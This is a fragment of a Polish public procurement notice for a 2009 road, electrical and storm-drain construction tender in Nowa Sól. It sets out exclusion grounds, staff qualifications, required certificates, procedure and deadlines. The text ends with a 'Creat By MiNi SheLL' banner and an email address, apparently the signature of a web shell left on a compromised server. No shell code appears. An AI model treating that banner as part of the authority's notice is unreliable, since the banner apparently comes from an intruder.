i.	podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;
j.	wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1-3 Prawa zamówień publicznych.


4.	Z postępowania o udzielenie zamówienia wyklucza się również wykonawców, którzy:
a.	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji; przepisu nie stosuje się do wykonawców, którym udziela się zamówienia na podstawie art. 62 ust. 1 pkt 2 lub art. 67 ust. 1 pkt 1 i 2;
b.	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
c.	nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3; 
d.	nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą.

5.	Dodatkowe warunki szczególne udziału wykonawców w postępowaniu:

5.1.	dysponowanie osobami zdolnymi do wykonania zamówienia - potencjał kadrowy (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców ich potencjał kadrowy będzie oceniany łącznie):
-	o zamówienie mogą się ubiegać wykonawcy dysponujący osobami o niżej wymienionych kwalifikacjach:


L.p./Stanowisko /Wymagana liczba osób	/ Wymagane uprawnienia 
i przynależność

1./	Kierownik budowy lub robót (branża drogowa)	/1os./1.	odpowiednie uprawnienia budowlane ;
2.	przynależność do Izby Samorządu Zawodowego Inżynierów Budownictwa

2./	Kierownik budowy lub robót(branża elektryczna)	/ 1os./1.	odpowiednie uprawnienia budowlane ;2.	przynależność do Izby Samorządu Zawodowego Inżynierów Budownictwa

3./Kierownik budowy lub robót (branża sanitarna - dotyczy kanalizacji deszczowej drogi) /1os./	1.	odpowiednie uprawnienia budowlane ;
2.	przynależność do Izby Samorządu Zawodowego Inżynierów Budownictwa


6.	Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu:
Ocena zostanie dokonana w oparciu o przedstawiony przez Wykonawcę Formularz oferty oraz załączniki stanowiące jego integralną część a w szczególności:
a)	oświadczenia, o których mowa w punkcie 9.1 instrukcji,
b)	dokumenty, o których mowa w punkcie 9.2  instrukcji,
c)	zaakceptowaną umowę,
d)	zaakceptowaną gwarancję jakości,
e)	wypełniony Formularz kosztorysu ofertowego,.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Informacje o oświadczeniach i dokumentach jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1.1.	Wymagane Oświadczenia 
a)	oświadczenie o spełnieniu warunków udziału w postępowaniu (w formie oryginału) wzór formularza oświadczenia zamieszczony jest w Rozdziale III, (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców każdy z nich musi złożyć oświadczenie);
b)oświadczenie wskazujące części zamówienia, które wykonawca powierzy podwykonawcom (w formie oryginału);


2.	Wymagane dokumenty:
2.1.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych z dnia 29 stycznia 2004r. zamawiający żąda, w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę, następujących dokumentów (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców każdy z nich musi złożyć n/w dokumenty):
a)	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert,
b)	aktualnego zaświadczenia właściwego naczelnika Urzędu Skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert,
c)	aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert,

2.2.	W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Zamawiający żąda następujących dokumentów:
a)	wykazu osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności;
b)	dokumentów stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia (chodzi o uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w odpowiedniej specjalności oraz wpis na listę członków Izby Samorządu Zawodowego Inżynierów Budownictwa, potwierdzony zaświadczeniem wydanym przez tę izbę);


2.3.	Inne wymagane dokumenty:	
a)	Dowód wniesienia wadium (w formie oryginału) - wnosi się przed upływem terminu składania ofert,
b)	Pełnomocnictwo - jeśli dotyczy (należy załączyć w formie oryginału lub kopii poświadczonej przez notariusza) - Ustanowienie pełnomocnika do reprezentowania wykonawców (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców) w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego, które w szczególności powinno:
-jednoznacznie określać postępowanie do którego się odnosi,
-	precyzować zakres umocowania,
-	wskazywać pełnomocnika,
-	wyliczać wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia,
-	być podpisane przez każdego wykonawcę,
c)	Stosowne pełnomocnictwo (należy załączyć w formie oryginału lub kopii poświadczonej przez notariusza) do podpisania oferty w sytuacji, w której uprawnienie do podpisania oferty nie wynika z zapisu w rejestrze lub ewidencji.

2.4.	Dokumenty zamienne wymagane od Wykonawców zagranicznych:
1.	jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów wymienionych w punkcie 9.2.1. a, b, c SIWZ składa dokument lub dokumenty wystawione w kraju w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono jego upadłości,
b)	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne li zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c)	nie ogłoszono wobec niego zakazu ubiegania się o zamówienie,
2.	dokumenty o których mowa w ust. 1 pkt 1 lit a i c powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składnia ofert. Dokument, o którym mowa w punkcie 1 lit. b powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składnia ofert,
3.	jeżeli w kraju pochodnia osoby lub kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów o których mowa w ust. 1 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat-nowosolski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe, ul. Moniuszki 3 b, 67-100 Nowa Sól, pokój nr 203 - odpłatnie.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.07.2009 godzina 10:00, miejsce: Starostwo Powiatowe, ul. Moniuszki 3 b, 67-100 Nowa Sól, w pok. nr 109 (Sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com